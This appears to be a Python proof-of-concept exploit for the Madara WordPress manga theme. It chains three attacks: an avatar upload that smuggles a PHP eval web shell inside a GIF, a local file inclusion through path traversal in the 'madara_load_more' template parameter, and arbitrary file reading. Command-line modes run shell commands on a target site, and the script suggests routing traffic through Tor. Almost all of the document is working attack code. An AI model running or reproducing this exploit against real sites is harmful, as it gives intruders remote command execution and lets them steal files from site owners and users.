import re
import requests
import sys
import os.path
from PIL import Image
import io

class MandaraClient:
    def __init__(self, host, proxy=None):
        self.sess = requests.Session()
        self.sess.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
        }

        if proxy is not None:
            self.sess.proxies = {
                'http': proxy,
                'https': proxy,
            }

        self.host = host
    
    def login(self, username, password):
        data = self.sess.get(self.host).text
        nonce = re.findall(r',"nonce":"([a-fA-F0-9]+)"', data)[0]

        data = {
            'action': 'wp_manga_signin',
            'login': username,
            'pass': password,
            'rememberme': 'forever',
            'nonce': nonce,
        }

        self.sess.post(f'{self.host}/wp-admin/admin-ajax.php', data=data)

    def upload_avatar(self):
        PAYLOAD = b'<?php eval($_GET["p"]) ?>'

        data = self.sess.get(f'{self.host}/user-settings/?tab=account-settings').text

        nonce = re.findall(r'<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-fA-F0-9]+)" />', data)[0]
        user_id = re.findall(r'<input type="hidden" value="(\d+)" name="userID">', data)[0]

        im_data = io.BytesIO()
        with Image.new('RGB', [201, 201]) as im:
            im.save(im_data, 'gif')
        
        im_data = bytearray(im_data.getvalue())
        im_data[32:] = PAYLOAD # just far enough for the image to be broken, but the headers to work

        files = {
            'action': (None, 'wp-manga-upload-avatar'),
            'userAvatar': ('smiley.gif', im_data, 'image/gif'),
            'userID': (None, user_id),
            '_wpnonce': (None, nonce),
        }

        response = self.sess.post(f'{self.host}/wp-admin/admin-ajax.php', files=files).json()

        if response['success']:
            path = response['data'][response['data'].index('wp-content/'):].split("'")[0]

            if PAYLOAD in self.sess.get(f'{self.host}/{path}').content:
                return path
            else:
                raise Exception('Image was converted')
        else:
            raise Exception(response['data'])

    # cwd will be in wp-content/themes/madara/app/plugins
    def poc(self, path, cmd=''):
        START_TOKEN = "<START>"
        eval = f'echo <<<END\n{START_TOKEN}\nEND; try {{ echo system($_GET[<<<END\nc\nEND]); }} catch(Exception $e) {{ echo $e->getMessage(); }} die(0);'

        data = {
            'action': 'madara_load_more',
            'page': '1',
            'template': 'plugins/' + path,
            'vars[orderby]': 'meta_value_num',
            'vars[paged]': '1',
            'vars[timerange]': '',
            'vars[posts_per_page]': '16',
            'vars[tax_query][relation]': 'OR',
            'vars[meta_query][0][relation]': 'AND',
            'vars[meta_query][relation]': 'AND',
            'vars[post_type]': 'wp-manga',
            'vars[post_status]': 'publish',
            'vars[meta_key]': '_latest_update',
            'vars[order]': 'desc',
            'vars[sidebar]': 'right',
            'vars[manga_archives_item_layout]': 'big_thumbnail',
        }

        response = self.sess.post(f'{self.host}/wp-admin/admin-ajax.php', data=data, params={'p': eval, 'c': cmd})
        return response.content.split(START_TOKEN.encode())[1].decode()

    def leak_file(self, full_path):
        return self.poc('../' * 10 + full_path)

if __name__ == '__main__':
    if len(sys.argv) > 1:
        client = MandaraClient(sys.argv[1], os.environ.get('PROXY'))

    if len(sys.argv) == 4 and sys.argv[2] == 'read':
        print(client.leak_file(sys.argv[3]))
    elif len(sys.argv) == 5 and sys.argv[2] == 'setup_rce':
        client.login(sys.argv[3], sys.argv[4])
        print(client.upload_avatar())
    elif len(sys.argv) == 5 and sys.argv[2] == 'rce':
        print(client.poc(f'../../../../../{sys.argv[3]}', sys.argv[4]))
    else:
        print('Set PROXY env variable to setup the HTTP(S) proxies (example: PROXY=socks5h://127.0.0.1:9050)')
        print(f'Usage: {__file__} http://vuln-host.com read /path/to/read')
        print(f'       {__file__} http://vuln-host.com setup_rce username password')
        print(f'       {__file__} http://vuln-host.com rce wp_content/my_image.gif command')
        